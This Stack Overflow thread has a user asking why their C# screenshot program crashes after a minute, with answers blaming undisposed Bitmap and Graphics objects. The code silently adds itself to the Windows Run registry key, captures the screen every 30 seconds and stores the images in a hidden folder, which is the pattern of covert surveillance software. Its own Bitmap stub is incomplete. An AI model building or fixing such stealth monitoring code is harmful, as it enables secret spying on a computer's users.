# Visual Studio says my build was successful yet my program crashes after one minute

Tags: c#, visual-studio, visual-studio-2017

I've debugged my C# code multiple times and reviewed the results to fix my code. I have fixed every error until there were no more. I built my program, but then when I went to start it, it just sat there for a minute and crashed. I have no idea what's wrong with my code.

I'm using Visual Studio 2017. Also, my program is supposed to take screenshots every 30 seconds and then save them to a folder on the C drive called SysApp.

Code:

```
using System;
using System.Threading;
using System.Reflection;
using System.IO;
using System.Windows;

namespace SysApp
{
    static class Program
    {
        static void Main()
        {
            try
            {
                Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                Assembly curAssembly = Assembly.GetExecutingAssembly();
                key.SetValue(curAssembly.GetName().Name, curAssembly.Location);
                Console.WriteLine(curAssembly.GetName());

            }
            catch { }
            int n = 0;
            while (n == 0)
            {
                Thread.Sleep(30000);
                OnTimedEvent();
            }
        }
        public static string st = "";
        public static string date = "";
        public static string month = "";
        public static string year = "";
        public static string time = "";
        public static string hour = "";
        public static string min = "";
        public static string sec = "";


        private static void OnTimedEvent()
        {
            st = DateTime.Today.Date.ToString();
            time = DateTime.Now.TimeOfDay.ToString();

            hour = DateTime.Now.Hour.ToString();
            min = DateTime.Now.Minute.ToString();
            sec = DateTime.Now.Second.ToString();

            date = DateTime.Today.Day.ToString();
            month = DateTime.Today.Month.ToString();
            year = DateTime.Today.Year.ToString();

            Console.WriteLine("The Elapsed event was raised at {0}_{1}_{2} at time {3}_{4}_{5} ", date, month, year, hour, min, sec);

            Bitmap memoryImage;
            memoryImage = new Bitmap(1000, 800);
            Size s = new Size(memoryImage.Width, memoryImage.Height);
            Graphics memoryGraphics = Graphics.FromImage(memoryImage);
            memoryGraphics.CopyFromScreen(0, 0, 0, 0, s);
            string str = "";
            if (Directory.Exists("C:\\SysApp"))
            {
                Console.WriteLine("directory exits");
            }
            else
            {
                Directory.CreateDirectory("C:\\SysApp");
                File.SetAttributes("C:\\SysApp", FileAttributes.Hidden);
                Console.WriteLine("new directory created");
            }
            //---------------------------------------

            str = string.Format("C:\\SysApp\\screen {0}_{1}.png", date + month + year, hour + min + sec);
            try
            {
                memoryImage.Save(str);
            }
            catch (Exception er)
            {
                Console.WriteLine("Sorry, there was an error: " + er.Message);
            }
        }
    }

    internal class Bitmap
    {
        private int v1;
        private int v2;

        public Bitmap(int v1, int v2)
        {
            this.v1 = v1;
            this.v2 = v2;
        }

        public double Width { get; internal set; }
        public double Height { get; internal set; }

        internal void Save(string str)
        {
            throw new NotImplementedException();
        }
    }
}
```

Comment: Welcome to StackOverflow.  To ask good questions read [tour] then [ask] then [mcve] .  To debug, read up on Trace and Debug so you can add logging like "step 1 OK", "step 2 OK", ... .  Also, learn to set breakpoints and to single-step through your code.  Just because there are no syntax errors does **not** mean your code will work!

Comment: It's best to learn to debug things yourself, you'll learn a lot more while you do that.  If we just hand you an answer you'll never learn to fish :)  ("give a man a fish and you feed him for a day...")

Comment: Never use "catch { }"

Comment: @DaveS I'm only asking because I went through it over and over trying to figure out what's wrong, but after a few hours of no luck I thought maybe someone on here could at least give me a hint to point me in the right direction. Also, thanks for the tips!

Comment: @JeroenHeier Why not?

Comment: @DaveS In short, it's extremely difficult for me to read at the moment (recovering from a brain tumor) so I thought maybe I missed something and a fresh set of eyes or something could help. :)

Comment: Well, you say: "when I went to start it it just sat there for a minute and crashed." -- but where is this in the code?  With Trace statements or breakpoints you could narrow that **way** down.  If you know it's in lines 25-30 instead of just somewhere in the whole thing then it's a lot easier to find.  It's also a lot easier for us to help if we know exactly where to look.

Comment: I meant like I went to `SysApp\bin\Debug` then opened `SysApp.exe`. So it doesn't really show anything specificly about the code unless I'm mistaken.

Comment: The only thing slightly out of place I could find was on the `Graphics.cs` in between line 10-15.

http://ideone.com/Y87Kjx <---That's the `Graphics.cs` code. Sorry, I don't know how to write long code in the comments of this site.

Comment: I was talking about using the Trace and Debug classes - https://stackoverflow.com/questions/1218211/where-do-we-use-debug-trace-statements .  Or I suppose you could add a bunch more Console.WriteLine() everywhere to see how far you get.

Comment: So you place tracers where you want to debug and you check the code line by line? Or am I completely misunderstanding what I'm reading?

Answer (score 2):

There is a memory leak because `Bitmap` and `Graphics` are not disposed after each iteration of the loop.

Adding the following after `memoryImage.Save(str);` fixes it:

```
memoryGraphics.Dispose();
memoryImage.Dispose();
```

Answer (score 1):

My guess is that you are either running out of memory or some other resource such as graphic handles.

I suggest you run your application using dotMemory from JetBrains (https://www.jetbrains.com/dotmemory/) and that will help you track down the issue.

Also as others have said empty catch statements are also dangerous. Rather add some debugging logging code in there to log the exception.

Comment: Wow, I didn't even think of that! I am running quite low on memory. Thanks.